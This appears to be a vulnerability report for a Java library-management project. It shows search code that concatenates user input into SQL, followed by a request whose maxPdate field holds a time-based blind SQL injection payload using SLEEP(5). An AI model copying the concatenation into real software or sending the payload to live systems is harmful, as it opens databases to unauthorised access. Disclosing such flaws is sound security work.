mrzyang / librarysystem Goto Github PK

 String baseSql = "from book where price>=" + minprice;  //如果前端表单传入minprice为空，则minprice=0为异常处理的结果
        String sql = baseSql;
        if (maxprice != 0) sql = baseSql + " and price<=" + maxprice;        //如果前端表单maxprice输入不为空
        if (!minpdate.equals("")) sql += " and pdate>= '" + minpdate + "'";
        if (!maxpdate.equals("")) sql += " and pdate<= '" + maxpdate + "'";
        if (cateId != 0) sql += " and cateId=" + cateId;
        if (!name.equals("")) {
            String keywords = "";
            for (int i = 0; i < name.length(); i++) //将关键字分解成一个一个字进行模糊查询
                keywords += "%" + name.charAt(i);
            sql += " and name like " + "'" + keywords + "%'";
        }
        String countSql = "select count(*) " + sql;   //查询满足条件的记录数
        sql = "select * " + sql + " limit ?,?";
        System.out.println(sql);
        System.out.println(countSql);

type=search&bookname=aaaaa&cateId=0&minprice=&maxprice=&minPdate=&maxPdate=2024-04-15' AND (SELECT 5405 FROM (SELECT(SLEEP(5)))ITKj) AND 'GJzT'='GJzT